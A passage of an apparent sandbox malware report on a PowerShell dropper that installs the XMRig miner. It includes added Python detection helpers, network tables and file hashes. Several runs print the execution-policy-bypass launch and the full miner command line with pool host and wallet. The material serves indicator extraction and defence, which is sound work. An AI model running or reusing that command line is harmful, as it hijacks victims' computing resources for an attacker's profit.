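     r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"'),
    (3308, 5008,
     r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
     "-o stratum+ssl://rx.unmineable.com:443 "
     "-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF"
     ".unmineable_worker_vilqtiac -p x"),
]

# xmrig's short and long spellings of the options that carry the indicators.
MINER_FLAGS = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
               "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
MONERO_ADDRESS = re.compile(r"4[1-9A-HJ-NP-Za-km-z]{94}")  # 95 base58 chars, leading '4'


@dataclass
class MinerFinding:
    pid: int
    parent_pid: int
    image: str
    algo: Optional[str]
    pool_host: Optional[str]
    pool_port: Optional[int]
    tls: bool
    coin: Optional[str]
    wallet: Optional[str]
    worker: Optional[str]
    parent_is_script_host: bool


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping double-quoted runs whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def miner_options(cmdline: str) -> dict[str, str]:
    """Collect -a/-o/-u/-p (and --algo/--url/--user/--pass, with or without '=')."""
    tokens = tokenize(cmdline)
    opts: dict[str, str] = {}
    i = 1  # token 0 is the image
    while i < len(tokens):
        key, has_eq, inline_value = tokens[i].partition("=")
        if key in MINER_FLAGS:
            if has_eq:
                opts[MINER_FLAGS[key]] = inline_value
            elif i + 1 < len(tokens):
                opts[MINER_FLAGS[key]] = tokens[i + 1]
                i += 1
        i += 1
    return opts


def split_pool_url(url: str) -> tuple[Optional[str], Optional[int], bool]:
    """'stratum+ssl://host:port' -> (host, port, tls). A bare host:port is treated as plain TCP."""
    parts = urlsplit(url if "://" in url else "stratum+tcp://" + url)
    return parts.hostname, parts.port, "ssl" in parts.scheme or "tls" in parts.scheme


def split_user(user: str) -> tuple[Optional[str], str, Optional[str]]:
    """unMineable's COIN:address.worker login (the form in this report) or a plain address[.worker]."""
    coin, has_coin, rest = user.partition(":")
    if not has_coin:
        coin, rest = None, user
    address, _, worker = rest.partition(".")
    return coin, address, worker or None


def looks_like_monero_address(address: Optional[str]) -> bool:
    """Shape check only: standard Monero addresses are 95 base58 characters starting with '4'."""
    return bool(address) and MONERO_ADDRESS.fullmatch(address) is not None


def analyse(events) -> list[MinerFinding]:
    """Flag every process started with a stratum pool URL, whatever its image name,
    and record whether a script interpreter spawned it (the lineage in this report)."""
    image_of = {pid: image for pid, _ppid, image, _cmd in events}
    findings = []
    for pid, ppid, image, cmdline in events:
        opts = miner_options(cmdline)
        url = opts.get("url", "")
        if not url.lower().startswith("stratum"):
            continue
        host, port, tls = split_pool_url(url)
        coin, wallet, worker = split_user(opts.get("user", ""))
        parent_image = image_of.get(ppid, "").rsplit("\\", 1)[-1].lower()
        findings.append(MinerFinding(pid, ppid, image, opts.get("algo"), host, port, tls,
                                     coin, wallet, worker, parent_image in SCRIPT_HOSTS))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_EVENTS):
        print(finding)
```

The dropped binary's hashes are identical across every run in this report, so they are stable indicators for this dropper, but an image-name or hash rule alone is weak against a renamed or rebuilt miner, which is why the example keys on the pool URL and login format. The __PSScriptPolicyTest_*.ps1 files listed under Files should not be added to the indicator set: PowerShell writes them itself to test whether AppLocker/WDAC script enforcement applies, and the c4ca4238… hash set is simply the hash of the single character 1.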
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
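The Network table above mixes three things a responder has to separate: forward DNS and the TCP flows that followed it, the reverse (in-addr.arpa) lookups the guest made for addresses it had talked to, and flows the table leaves unattributed (a destination with no Domain cell; elsewhere this report prints such rows with the column missing or shifted). The pool connection is the one that matters for blocking: rx.unmineable.com resolved to 161.35.34.195 and was reached over TLS on 443, so a port-based rule will not catch it and a domain- or wallet-based one is needed. The github.com and objects.githubusercontent.com flows precede the appearance of the dropped xmrig-6.21.3 directory and are consistent with the script fetching the miner from GitHub. The Python below is an added example, not part of the report, that parses the table, decodes PTR queries back to the IPs they name, and lists reverse-resolved addresses that no listed flow went to. The sample table is constructed from this run's rows plus two rows in the malformed shapes the report prints for the 52.111.227.14 and 52.142.223.178 flows.

```python
from __future__ import annotations

import ipaddress
import re
from collections import defaultdict
from typing import Optional

# Constructed sample input: the Network table of this report's behavioral2 run, copied
# row for row, plus two rows in the shapes the report prints elsewhere with the Domain
# column missing or shifted.
SAMPLE_TABLE = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp |
| NL | 52.142.223.178:80 | tcp | |
"""

PTR_NAME = re.compile(r"((?:\d{1,3}\.){4})in-addr\.arpa\.?")


def ptr_to_ip(name: str) -> Optional[str]:
    """'195.34.35.161.in-addr.arpa' -> '161.35.34.195'; None for a forward name."""
    m = PTR_NAME.fullmatch(name)
    if not m:
        return None
    return ".".join(reversed(m.group(1).rstrip(".").split(".")))


def parse_rows(table: str) -> list[dict]:
    """Parse the report's pipe table, tolerating rows whose Domain cell is missing or shifted."""
    rows = []
    for line in table.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 3 or cells[0] == "Country":
            continue
        country, dest, *rest = cells
        proto = next((c for c in rest if c in ("tcp", "udp")), None)
        domain = next((c for c in rest if c and c != proto), None)
        ip, _, port = dest.rpartition(":")
        if proto is None or not port.isdigit():
            continue
        rows.append({"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto})
    return rows


def summarize(table: str) -> dict:
    """Separate DNS traffic from real flows and decode PTR queries back to the IPs they name."""
    forward: dict[str, set[str]] = defaultdict(set)  # domain -> IPs connected to under that name
    reverse_looked_up: set[str] = set()               # IPs the guest asked PTR records for
    flows = []
    for r in parse_rows(table):
        if r["proto"] == "udp" and r["port"] == 53:
            ip = ptr_to_ip(r["domain"] or "")
            if ip:
                reverse_looked_up.add(ip)
            continue
        flows.append(r)
        if r["domain"]:
            forward[r["domain"]].add(r["ip"])
    connected = {r["ip"] for r in flows}
    return {
        "flows": flows,
        "forward": {d: sorted(ips) for d, ips in forward.items()},
        # PTR lookups for IPs no listed flow went to: traffic the table does not attribute
        "ptr_only": sorted(reverse_looked_up - connected, key=ipaddress.ip_address),
        # flows with no domain at all (direct-to-IP, or resolved before capture started)
        "unattributed": sorted((r["ip"] for r in flows if not r["domain"]), key=ipaddress.ip_address),
    }


def pool_endpoints(table: str, pool_host: str) -> list[str]:
    """ip:port pairs the pool hostname from the miner command line was actually connected on."""
    return sorted(f'{r["ip"]}:{r["port"]}' for r in parse_rows(table)
                  if r["proto"] == "tcp" and r["domain"] == pool_host)


if __name__ == "__main__":
    summary = summarize(SAMPLE_TABLE)
    print("pool:", pool_endpoints(SAMPLE_TABLE, "rx.unmineable.com"))
    print("reverse-resolved but no listed flow:", summary["ptr_only"])
    print("flows with no domain:", summary["unattributed"])
```

The ptr_only list is the useful residue: a PTR query for an address that appears in no listed flow usually means the guest did talk to it (Windows and the sandbox tooling reverse-resolve peers) and the flow was either not captured or was attributed to nothing, so those addresses are worth a second look before they are written off as platform noise.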
Files
memory/5008-3-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp
memory/5008-5-0x0000019FC9FD0000-0x0000019FC9FF2000-memory.dmp
memory/5008-8-0x0000019FCA180000-0x0000019FCA1F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_agfay2mf.5qu.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5008-9-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-18-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-25-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-29-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp
memory/5008-30-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-31-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-51-0x0000019FCA160000-0x0000019FCA172000-memory.dmp
memory/5008-64-0x0000019FCA140000-0x0000019FCA14A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3308-93-0x000001A6390C0000-0x000001A6390E0000-memory.dmp
memory/3308-94-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-95-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-96-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-97-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-98-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-99-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-100-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-101-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-102-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-103-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-104-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-105-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-106-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-107-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-108-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-109-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-110-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-111-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-112-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-113-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-114-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-115-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-116-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-117-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-118-0x00007FF621510000-0x00007FF622143000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
299s
Max time network
262s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(28 hits, none with a populated field)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3044 wrote to memory of 4580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3044 wrote to memory of 4580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/3044-0-0x00007FF8AF123000-0x00007FF8AF125000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kbhz0mqf.pqx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3044-9-0x00000227F1620000-0x00000227F1642000-memory.dmp
memory/3044-10-0x00007FF8AF120000-0x00007FF8AFBE2000-memory.dmp
memory/3044-11-0x00007FF8AF120000-0x00007FF8AFBE2000-memory.dmp
memory/3044-12-0x00007FF8AF120000-0x00007FF8AFBE2000-memory.dmp
memory/3044-13-0x00007FF8AF120000-0x00007FF8AFBE2000-memory.dmp
memory/3044-14-0x00007FF8AF120000-0x00007FF8AFBE2000-memory.dmp
memory/3044-15-0x00007FF8AF120000-0x00007FF8AFBE2000-memory.dmp
memory/3044-17-0x00000227F1B10000-0x00000227F1B22000-memory.dmp
memory/3044-18-0x00000227F1AF0000-0x00000227F1AFA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4580-49-0x000001C4EF5B0000-0x000001C4EF5D0000-memory.dmp
memory/4580-50-0x000001C4EF5F0000-0x000001C4EF610000-memory.dmp
memory/4580-51-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-54-0x000001C4EF610000-0x000001C4EF630000-memory.dmp
memory/4580-53-0x000001C4EF630000-0x000001C4EF650000-memory.dmp
memory/4580-52-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-55-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-56-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-57-0x000001C4EF630000-0x000001C4EF650000-memory.dmp
memory/4580-58-0x000001C4EF610000-0x000001C4EF630000-memory.dmp
memory/4580-59-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-60-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-61-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-62-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-63-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-64-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-65-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-66-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-67-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-68-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-69-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-70-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-71-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-72-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-73-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-74-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-75-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-76-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-77-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-78-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-79-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-80-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240426-en
Max time kernel
297s
Max time network
279s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(19 hits, none with a populated field)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1996 wrote to memory of 1760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1996 wrote to memory of 1760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.138:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.138:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
memory/1996-0-0x00007FFBCDF43000-0x00007FFBCDF45000-memory.dmp
memory/1996-1-0x000001C6DD770000-0x000001C6DD792000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w4cogki5.upm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1996-11-0x00007FFBCDF40000-0x00007FFBCEA01000-memory.dmp
memory/1996-12-0x00007FFBCDF40000-0x00007FFBCEA01000-memory.dmp
memory/1996-13-0x00007FFBCDF40000-0x00007FFBCEA01000-memory.dmp
memory/1996-14-0x00007FFBCDF43000-0x00007FFBCDF45000-memory.dmp
memory/1996-15-0x00007FFBCDF40000-0x00007FFBCEA01000-memory.dmp
memory/1996-17-0x00007FFBCDF40000-0x00007FFBCEA01000-memory.dmp
memory/1996-19-0x000001C6DDA40000-0x000001C6DDA4A000-memory.dmp
memory/1996-18-0x000001C6DDA50000-0x000001C6DDA62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1760-50-0x0000020371810000-0x0000020371830000-memory.dmp
memory/1760-51-0x0000020373000000-0x0000020373020000-memory.dmp
memory/1760-52-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-53-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-54-0x0000020373020000-0x0000020373040000-memory.dmp
memory/1760-55-0x0000020373040000-0x0000020373060000-memory.dmp
memory/1760-56-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1996-57-0x00007FFBCDF40000-0x00007FFBCEA01000-memory.dmp
memory/1760-58-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-59-0x0000020373020000-0x0000020373040000-memory.dmp
memory/1760-61-0x0000020373040000-0x0000020373060000-memory.dmp
memory/1760-60-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-62-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-63-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-64-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-65-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-66-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-67-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-68-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-69-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-70-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-71-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-72-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-73-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-74-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-75-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-76-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
memory/1760-77-0x00007FF7EA8C0000-0x00007FF7EB4F3000-memory.dmp
